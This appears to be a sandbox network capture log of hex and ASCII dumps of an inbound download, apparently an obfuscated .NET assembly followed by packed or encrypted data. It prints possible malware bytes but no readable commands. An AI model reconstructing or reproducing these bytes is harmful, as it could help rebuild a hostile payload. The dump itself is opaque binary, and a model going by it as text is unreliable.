2022-12-20 13:15:36 UTC	35	IN	Data Raw: 7e df 01 00 04 28 86 04 00 06 16 28 f3 00 00 06 20 03 00 00 00 28 ea 00 00 06 3a db f2 ff ff 26 20 0e 00 00 00 38 d0 f2 ff ff 00 02 73 a8 00 00 0a 7e 07 02 00 04 28 9e 04 00 06 38 b4 05 00 00 00 02 18 28 a9 00 00 0a 38 e7 f3 ff ff 00 02 7e 36 02 00 04 28 ba 04 00 06 20 24 05 00 00 7e 5a 01 00 04 28 52 04 00 06 6f aa 00 00 0a 38 75 ff ff ff 00 02 7e e0 01 00 04 28 86 04 00 06 1f 09 6f 53 00 00 0a 38 aa 0d 00 00 00 02 7e 41 02 00 04 28 c2 04 00 06 20 f4 06 00 00 7e 5a 01 00 04 28 52 04 00 06 6f a2 00 00 0a 38 3a 0a 00 00 00 02 7e de 01 00 04 28 86 04 00 06 1f 2a 1f 16 73 45 00 00 0a 6f 4c 00 00 0a 38 0c fb ff ff 00 02 20 20 03 00 00 20 bc 02 00 00 73 45 00 00 0a 6f ab 00 00 0a 38 d7 f4 ff ff 00 02 7e cc 01 00 04 28 82 04 00 06 20 52 06 00 00 7e 5a 01 00 04 Data Ascii: ~(( (:& 8s~(8(8~6( $~Z(Ro8u~(oS8~A( ~Z(Ro8:~(*sEoL8 sEo8~( R~Z
2022-12-20 13:15:37 UTC	51	IN	Data Raw: 0a 38 d5 0d 00 00 00 02 7e 76 02 00 04 28 f2 04 00 06 6f 47 00 00 0a 20 16 00 00 00 38 bc ee ff ff 00 02 7e e6 01 00 04 28 86 04 00 06 20 2a 10 00 00 7e 5a 01 00 04 28 52 04 00 06 6f 6d 00 00 0a 20 01 00 00 00 28 4a 01 00 06 3a 8d ee ff ff 26 38 83 ee ff ff 00 02 73 6e 00 00 0a 7e 9e 01 00 04 28 72 04 00 06 38 33 05 00 00 00 02 7e af 01 00 04 28 7a 04 00 06 20 c8 00 00 00 1f 39 73 45 00 00 0a 6f 4c 00 00 0a 38 ba 0b 00 00 00 02 7e e3 01 00 04 28 86 04 00 06 28 68 01 00 06 28 08 01 00 0a 6f 0d 01 00 0a 38 49 f7 ff ff 00 02 7e c1 01 00 04 28 7e 04 00 06 20 f4 0a 00 00 7e 5a 01 00 04 28 52 04 00 06 6f 3f 00 00 0a 20 22 00 00 00 28 4b 01 00 06 39 00 ee ff ff 26 38 f6 ed ff ff 00 02 7e 81 02 00 04 28 fa 04 00 06 20 5e 0d 00 00 7e 5a 01 00 04 28 52 04 00 06 6f Data Ascii: 8~v(oG 8~( *~Z(Rom (J:&8sn~(r83~(z 9sEoL8~((h(o8I~(~ ~Z(Ro? "(K9&8~( ^~Z(Ro
2022-12-20 13:15:37 UTC	67	IN	Data Raw: 1f 56 6f 53 00 00 0a 20 64 00 00 00 38 95 dc ff ff 00 02 7e d0 02 00 04 28 1a 05 00 06 1f 32 6f 53 00 00 0a 38 4f f1 ff ff 00 02 73 96 00 00 0a 7e a7 02 00 04 28 12 05 00 06 38 bb 1a 00 00 00 02 7e bb 02 00 04 28 16 05 00 06 17 6f 1b 01 00 0a 20 24 00 00 00 38 4b dc ff ff 00 02 7e ea 01 00 04 28 86 04 00 06 20 c2 00 00 00 1f 49 73 45 00 00 0a 6f 4c 00 00 0a 38 3c f1 ff ff 00 02 7e cd 02 00 04 28 1a 05 00 06 20 4a 03 00 00 7e 5a 01 00 04 28 52 04 00 06 22 00 00 10 41 17 19 16 73 94 00 00 0a 6f 95 00 00 0a 38 25 00 00 00 00 02 7e e9 01 00 04 28 86 04 00 06 20 a8 05 00 00 7e 5a 01 00 04 28 52 04 00 06 6f 6d 00 00 0a 38 8b e3 ff ff 00 02 7e cd 02 00 04 28 1a 05 00 06 28 fe 01 00 06 6f 8f 00 00 0a 38 1e fb ff ff 00 02 7e da 02 00 04 28 1e 05 00 06 20 9c 14 00 Data Ascii: VoS d8~(2oS8Os~(8~(o $8K~( IsEoL8<~( J~Z(R"Aso8%~( ~Z(Rom8~((o8~(
2022-12-20 13:15:37 UTC	83	IN	Data Raw: 38 bd fd ff ff 00 00 14 13 04 38 98 fe ff ff 00 dd ad 00 00 00 38 dc fd ff ff 1b 13 07 38 a0 fe ff ff 02 7e d1 01 00 04 28 82 04 00 06 6f dc 00 00 0a 13 05 20 03 00 00 00 28 fc 01 00 06 3a c2 fc ff ff 26 38 b8 fc ff ff 00 1f 12 13 07 38 15 fd ff ff 1f 0e 13 07 38 83 ff ff ff 17 38 07 00 00 00 38 00 00 00 00 11 00 45 02 00 00 00 05 00 00 00 80 fd ff ff 38 00 00 00 00 dd 37 00 00 00 75 26 00 00 01 14 fe 03 11 00 16 fe 03 5f 11 01 16 fe 01 5f fe 11 74 26 00 00 01 28 22 00 00 0a 38 00 00 00 00 dd 0f fd ff ff 38 08 00 00 00 00 2a 00 38 3e fc ff ff 20 33 00 0a 80 28 cd 00 00 0a 7a 11 01 39 e7 ff ff ff 38 00 00 00 00 28 ce 00 00 0a 38 d7 ff ff ff 41 1c 00 00 01 00 00 00 06 00 00 00 8a 03 00 00 a6 03 00 00 14 00 00 00 90 03 00 00 26 7e a7 00 00 04 14 fe 01 2a 00 Data Ascii: 8888~(o (:&88888E87u&__t&("888> 3(z98(8A&~
2022-12-20 13:15:37 UTC	99	IN	Data Raw: 00 00 0a 7d cb 00 00 04 38 02 06 00 00 00 02 7e d6 02 00 04 28 1a 05 00 06 20 dc 00 00 00 1f 17 73 45 00 00 0a 28 b8 02 00 06 20 17 00 00 00 fe 0e 01 00 38 9d fd ff ff 00 02 7e d6 02 00 04 28 1a 05 00 06 28 90 00 00 0a 6f 91 00 00 0a 20 00 00 00 00 28 b5 02 00 06 3a 7c fd ff ff 26 20 01 00 00 00 38 71 fd ff ff 00 02 7e d6 02 00 04 28 1a 05 00 06 20 b4 5e 04 00 7e 5a 01 00 04 28 52 04 00 06 6f 3f 00 00 0a 38 80 ff ff ff 00 02 16 28 54 00 00 0a 20 10 00 00 00 38 3a fd ff ff 00 02 7e d9 01 00 04 28 82 04 00 06 20 1e 5f 04 00 7e 5a 01 00 04 28 52 04 00 06 22 00 00 40 41 16 19 16 73 94 00 00 0a 6f 95 00 00 0a 38 df 07 00 00 00 02 7e d9 02 00 04 28 1a 05 00 06 20 97 01 00 00 1f 3e 73 5f 00 00 0a 6f 60 00 00 0a 38 6c 03 00 00 00 02 7e fc 02 00 04 28 2e 05 00 06 Data Ascii: }8~( sE( 8~((o (:\|& 8q~( ^~Z(Ro?8(T 8:~( _~Z(R"@Aso8~( >s_o`8l~(.
2022-12-20 13:15:37 UTC	115	IN	Data Raw: 01 00 04 28 82 04 00 06 20 c8 00 00 00 1f 16 73 45 00 00 0a 6f 4c 00 00 0a 38 b1 da ff ff 00 02 7e 4d 03 00 04 28 7e 05 00 06 11 02 20 f4 6c 04 00 7e 5a 01 00 04 28 52 04 00 06 6f 73 00 00 0a 74 99 00 00 01 6f 4a 01 00 0a 20 4d 00 00 00 28 61 03 00 06 3a 90 d5 ff ff 26 38 86 d5 ff ff 00 02 7e 3f 02 00 04 28 be 04 00 06 20 ba 01 00 00 20 b6 00 00 00 73 5f 00 00 0a 6f 60 00 00 0a 20 7a 00 00 00 38 60 d5 ff ff 00 02 7e 27 03 00 04 28 3e 05 00 06 17 6f 9a 00 00 0a 38 3c 00 00 00 00 02 7e 03 03 00 04 28 2e 05 00 06 19 6f 92 00 00 0a 38 5c e5 ff ff 00 02 7e 2a 03 00 04 28 3e 05 00 06 20 ea 67 04 00 7e 5a 01 00 04 28 52 04 00 06 6f 3f 00 00 0a 38 0d 12 00 00 00 02 7e 27 03 00 04 28 3e 05 00 06 20 4a 03 00 00 7e 5a 01 00 04 28 52 04 00 06 22 00 00 10 41 17 19 16 Data Ascii: ( sEoL8~M(~ l~Z(RostoJ M(a:&8~?( s_o` z8`~'(>o8<~(.o8\~*(> g~Z(Ro?8~'(> J~Z(R"A
2022-12-20 13:15:37 UTC	131	IN	Data Raw: 00 04 28 52 04 00 06 22 00 00 a0 41 73 e0 00 00 0a 13 05 38 33 fe ff ff 12 04 28 dd 00 00 0a 6b 13 03 38 a9 fc ff ff 00 13 30 04 00 f8 00 00 00 11 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 1b 00 00 00 a8 00 00 00 38 16 00 00 00 00 02 7e 5c 02 00 04 28 ca 04 00 06 6f d3 00 00 0a 38 72 00 00 00 00 02 7e 58 02 00 04 28 c6 04 00 06 02 7e 58 02 00 04 28 c6 04 00 06 6f d4 00 00 0a 6f d6 00 00 0a 38 50 00 00 00 11 01 39 47 00 00 00 38 00 00 00 00 02 7e 5c 02 00 04 28 ca 04 00 06 02 7e 58 02 00 04 28 c6 04 00 06 6f d4 00 00 0a 28 92 03 00 06 38 93 ff ff ff 00 02 7e 58 02 00 04 28 c6 04 00 06 6f d1 00 00 0a 17 fe 01 13 01 38 b4 ff ff ff 00 00 00 2a 00 02 7e 58 02 00 04 28 c6 04 00 06 17 6f d2 00 00 0a 38 ca ff ff ff 00 02 7e 58 Data Ascii: (R"As83(k80 8E8~\(o8r~X(~X(oo8P9G8~\(~X(o(8~X(o8*~X(o8~X
2022-12-20 13:15:37 UTC	147	IN	Data Raw: 00 20 3f 00 00 00 59 fe 0e 13 00 20 31 00 00 00 28 16 04 00 06 3a c0 f8 ff ff 26 38 b6 f8 ff ff fe 0c 0c 00 20 10 00 00 00 fe 0c 15 00 9c 20 41 01 00 00 38 a2 f8 ff ff 11 38 1a 5a 13 2f 20 1e 01 00 00 38 92 f8 ff ff fe 0c 0c 00 20 11 00 00 00 fe 0c 15 00 9c 20 10 00 00 00 38 7a f8 ff ff fe 0c 0c 00 20 10 00 00 00 fe 0c 15 00 9c 20 08 01 00 00 28 16 04 00 06 3a 5d f8 ff ff 26 38 53 f8 ff ff fe 0c 2a 00 20 0a 00 00 00 fe 0c 13 00 9c 20 d2 00 00 00 28 17 04 00 06 39 3a f8 ff ff 26 20 37 00 00 00 38 2f f8 ff ff fe 0c 0c 00 20 12 00 00 00 fe 0c 15 00 9c 20 6d 00 00 00 28 16 04 00 06 3a 12 f8 ff ff 26 38 08 f8 ff ff 20 b2 00 00 00 20 3b 00 00 00 59 fe 0e 15 00 20 1a 01 00 00 28 16 04 00 06 39 ee f7 ff ff 26 20 22 01 00 00 38 e3 f7 ff ff 16 13 38 20 c1 00 00 00 Data Ascii: ?Y 1(:&8 A88Z/ 8 8z (:]&8S* (9:& 78/ m(:&8 ;Y (9& "88
2022-12-20 13:15:37 UTC	163	IN	Data Raw: 8d 6b 00 00 01 25 d0 56 01 00 04 28 6b 01 00 0a 0c 28 a8 01 00 0a 03 6f c6 01 00 0a 28 dc 03 00 06 0d 73 b7 01 00 0a 13 04 28 da 03 00 06 13 05 11 05 08 6f b9 01 00 0a 11 05 09 6f ba 01 00 0a 11 04 11 05 6f c7 01 00 0a 17 73 a5 01 00 0a 13 06 11 06 07 16 07 8e 69 6f bc 01 00 0a 11 06 6f bd 01 00 0a 11 04 6f b8 01 00 0a 28 22 04 00 06 2a 00 00 00 1e 02 28 28 00 00 0a 2a 2e 00 fe 09 00 00 28 c8 01 00 0a 2a 4e 02 28 28 00 00 0a 02 03 73 80 01 00 0a 7d 4e 01 00 04 2a 32 02 7b 4e 01 00 04 6f 7a 01 00 0a 2a 00 00 00 36 02 7b 4e 01 00 04 03 6f 82 01 00 0a 2a 00 00 3e 02 7b 4e 01 00 04 03 04 05 6f c9 01 00 0a 2a 32 02 7b 4e 01 00 04 6f ca 01 00 0a 2a 00 00 00 32 02 7b 4e 01 00 04 28 31 04 00 06 2a 00 00 00 2a fe 09 00 00 6f 83 01 00 0a 2a 00 06 2a 00 00 1e 02 28 Data Ascii: k%V(k(o(s(ooosiooo("((.(N((s}N2{Noz6{No>{No2{No2{N(1o(
2022-12-20 13:15:37 UTC	179	IN	Data Raw: fc 01 01 00 00 00 43 0b 4d 3e 73 04 8f 00 0c 02 01 00 20 00 43 0b 58 3e 79 04 8f 00 1c 02 01 00 00 00 43 0b 63 3e 73 04 90 00 2c 02 01 00 20 00 43 0b 6e 3e 79 04 90 00 d0 02 01 00 00 00 43 0b 79 3e 73 04 91 00 e0 02 01 00 20 00 43 0b 84 3e 79 04 91 00 f4 02 01 00 00 00 43 0b 8f 3e d0 09 92 00 04 03 01 00 20 00 43 0b 9a 3e d6 09 92 00 18 03 01 00 00 00 43 0b a5 3e d0 09 93 00 28 03 01 00 20 00 43 0b b0 3e d6 09 93 00 3c 03 01 00 00 00 43 0b bb 3e e7 09 94 00 4c 03 01 00 20 00 43 0b c6 3e ed 09 94 00 60 03 01 00 00 00 43 0b d1 3e 80 04 95 00 70 03 01 00 20 00 43 0b dc 3e 86 04 95 00 84 03 01 00 00 00 43 0b e7 3e 38 07 96 00 94 03 01 00 20 00 43 0b f2 3e 3e 07 96 00 a8 03 01 00 00 00 43 0b fd 3e 80 04 97 00 b8 03 01 00 20 00 43 0b 08 3f 86 04 97 00 c8 03 01 Data Ascii: CM>s CX>yCc>s, Cn>yCy>s C>yC> C>C>( C><C>L C>`C>p C>C>8 C>>C> C?
2022-12-20 13:15:37 UTC	195	IN	Data Raw: e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 00 01 00 e7 10 00 Data Ascii:
2022-12-20 13:15:37 UTC	211	IN	Data Raw: b9 01 eb 00 01 00 bc 01 ed 00 02 00 bb 01 ed 00 01 00 be 01 ef 00 02 00 bd 01 ef 00 01 00 c0 01 f1 00 02 00 bf 01 f1 00 01 00 c2 01 f3 00 02 00 c1 01 f3 00 01 00 c4 01 f5 00 02 00 c3 01 f5 00 01 00 c6 01 f7 00 02 00 c5 01 f7 00 01 00 ca 01 f9 00 02 00 c9 01 f9 00 01 00 cc 01 fb 00 02 00 cb 01 fb 00 01 00 ce 01 fd 00 02 00 cd 01 fd 00 01 00 d0 01 ff 00 02 00 cf 01 ff 00 01 00 d2 01 01 01 02 00 d1 01 01 01 01 00 d4 01 03 01 02 00 d3 01 03 01 01 00 d6 01 05 01 02 00 d5 01 05 01 01 00 d8 01 07 01 02 00 d7 01 07 01 01 00 da 01 09 01 02 00 d9 01 09 01 01 00 dc 01 0b 01 02 00 db 01 0b 01 01 00 de 01 0d 01 02 00 dd 01 0d 01 01 00 e0 01 0f 01 02 00 df 01 0f 01 01 00 e2 01 11 01 02 00 e1 01 11 01 01 00 e4 01 13 01 02 00 e3 01 13 01 01 00 e6 01 15 01 02 00 e5 01 15 Data Ascii:
2022-12-20 13:15:37 UTC	227	IN	Data Raw: 73 67 51 38 38 35 6c 78 49 74 71 48 50 78 64 47 00 52 55 70 47 37 6c 38 48 64 64 71 4e 48 6c 75 32 55 5a 33 00 6d 79 4a 39 39 70 38 73 75 6b 62 62 4d 32 68 6c 72 63 66 00 54 64 35 59 77 75 38 32 32 54 50 71 31 52 67 32 54 65 77 00 6d 4e 55 42 4b 4e 38 59 33 62 51 65 75 5a 73 30 41 6e 6d 00 6e 39 69 34 65 33 38 72 4c 4a 65 34 65 73 45 74 48 78 31 00 4e 79 67 51 47 41 38 53 34 46 56 72 32 6d 42 5a 38 70 59 00 6b 38 68 36 54 42 38 41 6a 63 50 5a 6e 4a 49 42 62 51 4b 00 58 55 6d 41 36 4b 38 33 39 38 55 34 48 31 61 50 4c 5a 6b 00 7a 6c 59 55 66 45 38 49 76 58 55 51 49 4c 4b 70 57 30 30 00 57 4b 44 44 47 50 38 43 69 41 6f 67 46 41 58 36 72 50 63 00 41 41 53 58 4e 6a 38 6d 31 6d 50 6d 42 33 46 69 71 43 73 00 69 39 36 47 58 52 38 45 46 52 76 78 30 51 74 32 52 70 Data Ascii: sgQ885lxItqHPxdGRUpG7l8HddqNHlu2UZ3myJ99p8sukbbM2hlrcfTd5Ywu822TPq1Rg2TewmNUBKN8Y3bQeuZs0Anmn9i4e38rLJe4esEtHx1NygQGA8S4FVr2mBZ8pYk8h6TB8AjcPZnJIBbQKXUmA6K8398U4H1aPLZkzlYUfE8IvXUQILKpW00WKDDGP8CiAogFAX6rPcAASXNj8m1mPmB3FiqCsi96GXR8EFRvx0Qt2Rp
2022-12-20 13:15:37 UTC	243	IN	Data Raw: 5a 54 70 37 62 4b 68 38 00 49 43 79 52 71 43 41 37 33 00 61 4e 78 48 48 68 49 31 38 78 00 64 79 61 48 30 43 55 65 54 56 00 72 79 61 48 58 54 63 34 71 30 00 6a 56 75 48 55 4d 37 4e 41 34 00 4c 6d 51 6c 71 4f 6e 35 68 4f 00 62 68 73 6c 69 78 70 5a 51 63 00 6b 73 59 6c 49 6f 70 4e 47 48 00 65 76 6b 6c 63 4f 47 76 6b 4e 00 58 6b 6e 6c 6e 51 4c 41 41 4f 00 75 68 73 6c 34 69 69 65 4f 54 00 71 42 67 6c 59 41 68 67 5a 76 00 51 4a 4c 64 6b 4e 30 54 53 4d 00 70 65 69 64 50 78 32 62 4f 6e 00 6f 31 75 64 49 77 78 65 35 31 00 6b 69 52 6a 5a 76 71 35 58 47 00 74 67 4c 6a 4c 4e 32 67 45 73 00 72 72 66 6a 43 4e 57 69 72 54 00 65 75 61 6a 47 34 31 34 54 45 00 6d 66 74 31 6b 58 6f 51 43 00 66 54 39 34 37 50 67 76 32 00 4e 69 34 48 4e 45 78 54 51 59 00 57 58 62 48 64 6d 6c Data Ascii: ZTp7bKh8ICyRqCA73aNxHHhI18xdyaH0CUeTVryaHXTc4q0jVuHUM7NA4LmQlqOn5hObhslixpZQcksYlIopNGHevklcOGvkNXknlnQLAAOuhsl4iieOTqBglYAhgZvQJLdkN0TSMpeidPx2bOno1udIwxe51kiRjZvq5XGtgLjLN2gEsrrfjCNWirTeuajG414TEmft1kXoQCfT947Pgv2Ni4HNExTQYWXbHdml
2022-12-20 13:15:37 UTC	259	IN	Data Raw: 65 78 74 42 6f 78 43 6f 6c 75 6d 6e 00 00 29 01 00 24 4e 61 74 69 6f 6e 61 6c 69 74 79 44 61 74 61 47 72 69 64 56 69 65 77 54 65 78 74 42 6f 78 43 6f 6c 75 6d 6e 00 00 2e 01 00 29 52 65 73 69 64 65 6e 74 69 61 6c 53 74 61 74 65 44 61 74 61 47 72 69 64 56 69 65 77 54 65 78 74 42 6f 78 43 6f 6c 75 6d 6e 00 00 2c 01 00 27 52 65 73 69 64 65 6e 74 69 61 6c 4c 47 41 44 61 74 61 47 72 69 64 56 69 65 77 54 65 78 74 42 6f 78 43 6f 6c 75 6d 6e 00 00 30 01 00 2b 52 65 73 69 64 65 6e 74 69 61 6c 41 64 64 72 65 73 73 44 61 74 61 47 72 69 64 56 69 65 77 54 65 78 74 42 6f 78 43 6f 6c 75 6d 6e 00 00 28 01 00 23 4f 63 63 75 70 61 74 69 6f 6e 44 61 74 61 47 72 69 64 56 69 65 77 54 65 78 74 42 6f 78 43 6f 6c 75 6d 6e 00 00 26 01 00 21 44 69 73 61 62 6c 65 64 44 61 74 61 47 Data Ascii: extBoxColumn)$NationalityDataGridViewTextBoxColumn.)ResidentialStateDataGridViewTextBoxColumn,'ResidentialLGADataGridViewTextBoxColumn0+ResidentialAddressDataGridViewTextBoxColumn(#OccupationDataGridViewTextBoxColumn&!DisabledDataG
2022-12-20 13:15:37 UTC	275	IN	Data Raw: 2f 08 bc cc 22 ff 93 20 03 46 00 87 2f f6 29 d8 da aa 3d ee 4c 4c 9d fd 77 a7 f3 52 2d 33 62 4d 5e 9b de 61 0a e5 df 22 76 b6 20 57 f4 a0 f4 cb bf d2 79 37 f8 64 bd 87 f2 99 6f 61 31 9d 6f db 82 0b 91 77 21 cd 11 b3 55 5a 6c 54 61 c1 83 87 53 b1 ba 8e e8 d6 59 c7 d6 75 4a 65 51 4c 10 26 7e 22 a4 dc 23 82 09 cb cd 12 98 da b5 f0 3a bc c9 e0 c6 1b 49 76 7c 69 0f 4b 14 fd ea 48 53 62 b3 2e a6 8c 81 1a 6e ce 81 b3 00 69 2e 75 e1 2a 04 6e 8b 9b 49 2e 3a 38 0a d8 8c 94 4a 3d 5a 09 b7 c8 de 3d bf d7 4c 2e a7 03 7f a9 18 82 85 7f 55 60 06 d0 97 6c 1a 2e 13 73 ae 66 00 27 18 1f 5e 19 8d 93 da fc db b7 85 e7 20 cc f9 57 0b 97 91 88 a8 de 78 a0 ac 68 45 e5 cd e0 53 26 8a 79 62 7d 9d d0 5e 4a 21 1c 85 7a 45 7e 3e 20 77 7a 09 32 b7 32 05 56 c9 f3 0d fa a9 95 e6 77 31 Data Ascii: /" F/)=LLwR-3bM^a"v Wy7doa1ow!UZlTaSYuJeQL&~"#:Iv\|iKHSb.ni.u*nI.:8J=Z=L.U`l.sf'^ WxhES&yb}^J!zE~> wz22Vw1
2022-12-20 13:15:37 UTC	291	IN	Data Raw: 24 b6 d2 74 17 88 5b b8 c4 a7 37 14 22 a0 8d 1a c8 c1 c3 17 b5 46 de a2 cd ac b1 85 cb 5c 86 03 0b 0e a5 b4 8a 88 0a 57 18 6d 77 8c 31 c5 c5 5b a1 2b 62 64 87 f0 61 7a 18 7f 8f 21 87 30 1e ac 17 0b 5c dd c9 b2 66 fd 56 fd fd 31 cc 5e be cf 1c e3 2b 2c e7 81 20 ea 9e 8a 80 e6 54 0c 0d cb 65 d3 73 7f 0d e8 ca 90 92 10 51 57 95 18 aa dc 1b 83 ea a0 7c 30 11 7a 04 dd b2 3f 79 dd ae e4 81 5a cb 3e 25 5e 84 e4 2b 7a d8 53 8a c3 9b db 9d 26 95 7a fc 87 57 0f 21 e3 96 ab d6 29 85 a1 b5 39 9a ad c3 20 8a f4 98 32 6c d2 b4 8d da 5c 5e 5a c0 bb eb 0f a4 70 74 3a a1 a8 fb 58 f6 f7 d1 cd 0e 12 78 55 2f 1e ac e8 75 3a db f8 33 77 83 38 70 bc ec b2 ef 5c 56 8c 36 3b ef 63 8b ef d2 db 90 25 03 b3 b0 52 d8 38 47 5b f4 c9 57 31 d7 2e 42 cf 67 e2 c2 b7 35 d4 e8 fc 8e 02 d4 Data Ascii: $t[7"F\Wmw1[+bdaz!0\fV1^+, TesQW\|0z?yZ>%^+zS&zW!)9 2l\^Zpt:XxU/u:3w8p\V6;c%R8G[W1.Bg5
2022-12-20 13:15:37 UTC	307	IN	Data Raw: 81 28 84 ab 96 2c fa 04 80 ed 0c 9d 77 d3 bb 38 32 9a 45 70 04 dd 85 be f2 48 98 b4 b3 9d 64 ac f4 16 cc 2e b7 89 c3 56 a2 38 cc 62 fd 51 28 aa 39 7c cd 76 02 d7 2e 6c 29 2a 21 2a b3 59 9d fc fa df 99 3b 98 73 26 02 95 ee 08 89 44 fc 11 c3 c8 57 63 ff 85 8a e3 b0 f4 73 12 ae f3 ca 4f d1 eb 99 32 87 b6 06 e6 bb d0 d4 64 ad 18 8d bc ae 59 dc 46 0d 36 20 74 60 57 69 86 a0 2b 37 68 0f 94 47 c1 e4 f6 1c e2 55 42 93 c6 dc eb 7c 76 85 6c e1 1c d0 36 fc f7 07 38 d6 fa 13 13 9d b7 68 86 4d 02 7a 00 45 05 ff 55 42 80 0d 89 32 c1 b0 f3 71 7b cf 2b 31 e7 1f 40 48 50 a1 95 de 29 83 3e 82 54 8d fb ab e0 8b b0 90 da 16 e9 3e 6d 6f 00 7d 4c e8 3a 02 04 d9 99 be fc e0 cf d4 58 26 13 c2 7a 6d a2 74 f0 0d 72 75 f9 27 7b 82 75 c5 58 d2 91 81 08 30 ff 9b 5a af 6e 1c 7f 92 a4 Data Ascii: (,w82EpHd.V8bQ(9\|v.l)!Y;s&DWcsO2dYF6 t`Wi+7hGUB\|vl68hMzEUB2q{+1@HP)>T>mo}L:X&zmtru'{uX0Zn
2022-12-20 13:15:37 UTC	323	IN	Data Raw: 59 bb 36 05 08 72 87 a5 6b fb 64 54 7e 1b fd 09 1e e8 f7 b7 01 e1 08 ee ec ad 5d 76 67 ae dd 88 ad cc 07 fa 5a 45 eb b1 81 90 04 ec 36 85 12 d3 7f a2 ab c6 8f a5 d2 23 05 81 1f 50 9d 00 8c 7e 35 60 6c 11 07 b9 24 34 1f 5f e9 52 ac 4d fa d4 85 71 4f c9 ec b7 87 9d a3 43 e5 9d 93 ef 8a a3 60 02 fe 13 99 62 89 7f 86 96 31 c7 04 90 c3 9b 94 96 3e a5 78 d3 dd 3f 28 1a b1 77 b2 6f 34 39 94 a3 0f 91 f8 9b bf f3 7d f5 54 22 e4 2a 83 dd 9b 21 18 4c b0 39 54 d7 ae 61 5c e3 8a 6a 51 1b 8c 80 7d 4a e1 5f f6 58 5f 12 57 80 44 fd 8c f9 5b 6a 11 f0 56 ed ce 26 82 77 92 22 64 58 92 45 0e 14 92 d8 e4 59 d2 c9 71 9d b9 31 89 ec 9c cb 06 d8 0d 5f af a5 d2 af 6c 5b a0 77 e7 7f ad 1d 5a bc eb f3 6f de 86 22 7a 0b f0 53 66 61 9c 56 1d 9a 6e 03 ef e8 4f 52 bc fc 7b 15 c7 bd 47 Data Ascii: Y6rkdT~]vgZE6#P~5`l$4_RMqOC`b1>x?(wo49}T"*!L9Ta\jQ}J_X_WD[jV&w"dXEYq1_l[wZo"zSfaVnOR{G
2022-12-20 13:15:37 UTC	339	IN	Data Raw: d4 24 5a 9f 58 be d1 aa f3 4a 4c 9d d1 ec 6f 0f 4f d5 5a b4 ec 7a 34 28 af aa b5 76 ec f1 1e f0 2c 6b 90 31 41 eb f1 86 37 12 a9 2c a1 91 93 0c ab 52 3c de a2 6e d3 b3 cf 84 b5 23 8f 5e 18 ea 42 69 a5 e9 51 cc b0 0c a3 83 10 2a 15 24 0b 6d 42 75 2e fd cd a6 3b 83 00 be 9d d6 be a2 e0 75 29 cf b8 fb 4f 95 28 b2 25 fd 7c 30 d6 f3 ee bc 7e f1 f6 68 c2 d9 ff 4c fa 33 5f b3 46 06 8c 29 a0 e7 7e 16 b2 2d 23 ba 8e e5 2c fd 78 26 e2 8c d0 f5 27 22 05 1b b6 82 c5 7c 11 39 1e 0c 33 9d 9c 2b a5 eb da 9b 90 b8 f2 d5 e1 81 68 16 39 78 1b d4 28 9c 80 c2 35 9c 77 84 2e 78 64 4f 97 a7 93 a0 3e 8e 10 7b 4c 30 88 c1 20 dc 84 42 3e 5f 56 a2 18 27 17 ad 3d 24 b8 68 66 f2 a1 c1 ce 47 73 49 ad bb 0a 9d 8f 6c 1c 2e 08 62 ac a4 15 a0 77 83 32 87 cc 01 5d 38 be dd 8e 38 4d 66 dc Data Ascii: $ZXJLoOZz4(v,k1A7,R<n#^BiQ*$mBu.;u)O(%\|0~hL3_F)~-#,x&'"\|93+h9x(5w.xdO>{L0 B>_V'=$hfGsIl.bw2]88Mf
2022-12-20 13:15:37 UTC	355	IN	Data Raw: 83 51 ed 54 0c 4c 6e 2a 3e ae 57 1f 6e 0d 7e 58 4f a4 2c b1 8b 2d c4 14 3d 2a 8d 0d d4 fa 7f 65 cb 89 13 f7 db 79 63 5e c4 94 0b e5 87 11 2f 9c 3c 21 9b 87 fe d3 d6 01 88 66 4f 59 a9 e8 10 88 77 2b ff dc 54 58 ef ea bd 35 82 08 f8 f6 f4 5f f2 33 f4 7d 4c 3d 89 8b bf 1c e4 09 f5 0b 16 2b 5a c0 0c bc 28 2f 99 82 23 95 fb 9a 34 e8 69 c1 d9 fa e6 6c 11 92 5d 7b b6 aa 00 28 a5 5c 04 05 3b ef d5 3a 0d ff 00 64 56 2b bd 96 59 47 5c 68 b2 00 f3 bd e3 1f e6 5c cc 75 e6 3d ec ec d9 aa 8e b8 b1 de 48 07 39 2e 27 31 88 3d 58 fb 53 10 c6 75 3a 2a 2a d0 06 6e 07 79 83 61 3f f6 85 87 26 51 82 e5 51 64 e3 b9 62 2f d5 2b 2b 20 7d 2c 5a 92 60 ae e8 9d 95 19 66 df d1 12 e0 3e 38 99 58 4e 2d 5b f8 2d b2 d3 98 1e 4d 65 b2 52 6d 2d 58 5a 6e e6 71 c9 d7 fe b2 7a 9d 99 10 2b 7b Data Ascii: QTLn>Wn~XO,-=eyc^/<!fOYw+TX5_3}L=+Z(/#4il]{(\;:dV+YG\h\u=H9.'1=XSu:**nya?&QQdb/++ },Z`f>8XN-[-MeRm-XZnqz+{
